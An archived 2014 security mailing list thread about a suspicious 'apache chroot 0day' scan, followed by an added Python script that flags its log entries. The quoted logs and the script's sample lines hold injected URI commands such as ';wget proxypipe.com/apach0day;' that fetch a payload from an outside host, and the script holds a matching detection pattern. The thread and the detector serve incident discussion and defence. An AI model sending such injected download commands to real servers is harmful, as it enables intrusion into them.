PaulDotCom mailing list archives

Re: [Security Weekly] apache chroot 0day?


From: Eric Buckingham <erikb () proxypipe com>
Date: Mon, 28 Jul 2014 14:38:42 -0400

Looks like an attempt by somebody to troll us sadly :/


On Mon, Jul 28, 2014 at 2:18 PM, Jim Halfpenny <jim.halfpenny () gmail com> wrote:

It didn't take long to get a pcap of this request, I started httpd on
a random VPS of mine and it's the only request I have received so far.
At first glance it doesn't seem like anything special.

Jim

On 28 July 2014 15:54, Robin Wood <robin@digi.ninja> wrote:



On 28 July 2014 15:30, Frank Michael <frankcmichael () gmail com> wrote:

Various sources confirming the same thing for other sites. All on 7/28.
Keep an eye open.


I've just mailed the SANS ISC about it saying that others had seen it, see
if they come back with anything.

Robin


On Jul 28, 2014, at 5:09 AM, Robin Wood <robin@digi.ninja> wrote:

I've got a site that was scanned this morning by a tool that left these
entries in the logs:

    [HTTP_USER_AGENT] => chroot-apach0day
    [HTTP_REFERRER] => /xA/x0a/x05
    [REQUEST_URI] => /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget%20proxypipe.com/apach0day;

Anyone recognise it? That user agent isn't coming up in google searches.

Robin

_______________________________________________

Pauldotcom mailing list
Pauldotcom () mail securityweekly com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com
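
Added example, not part of the thread and not any poster's code: a small log check for the request reported above, flagging the `chroot-apach0day` user agent and any request URI that, once URL-decoded, carries a shell separator followed by a download tool. It assumes Apache combined log format; the sample lines, IP addresses and timestamps are constructed, with the first line built from the fields quoted in the thread.

```python
import re
from urllib.parse import unquote

# Combined Log Format (assumed):
# host ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# User agent string reported in the thread.
SCANNER_AGENT = "chroot-apach0day"
# Shell separator followed by a download tool, matched after URL-decoding.
CMD_RE = re.compile(r'[;|&`]\s*(?:wget|curl)\b', re.IGNORECASE)

def classify(line):
    """Return (host, reasons) for a suspicious log line, otherwise None."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None  # unparseable lines are skipped, not flagged
    reasons = []
    if SCANNER_AGENT in m["agent"]:
        reasons.append("user-agent")
    if CMD_RE.search(unquote(m["uri"])):
        reasons.append("command-in-uri")
    return (m["host"], reasons) if reasons else None

def scan(lines):
    """Classify every line and keep only the hits."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample lines (documentation-range IPs, made-up timestamps).
SAMPLE = [
    '192.0.2.10 - - [28/Jul/2014:09:09:01 +0000] '
    '"GET /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget%20proxypipe.com/apach0day; HTTP/1.1" '
    '200 512 "/xA/x0a/x05" "chroot-apach0day"',
    '198.51.100.7 - - [28/Jul/2014:09:10:12 +0000] '
    '"GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    # Same URI pattern with an encoded separator and an ordinary user agent.
    '203.0.113.5 - - [28/Jul/2014:09:11:40 +0000] '
    '"GET /?q=a%3Bwget%20example.invalid/x HTTP/1.0" 404 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for host, reasons in scan(SAMPLE):
        print(host, ",".join(reasons))
```

Matching on the decoded URI as well as the user agent means a sender that changes its user agent string is still flagged.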

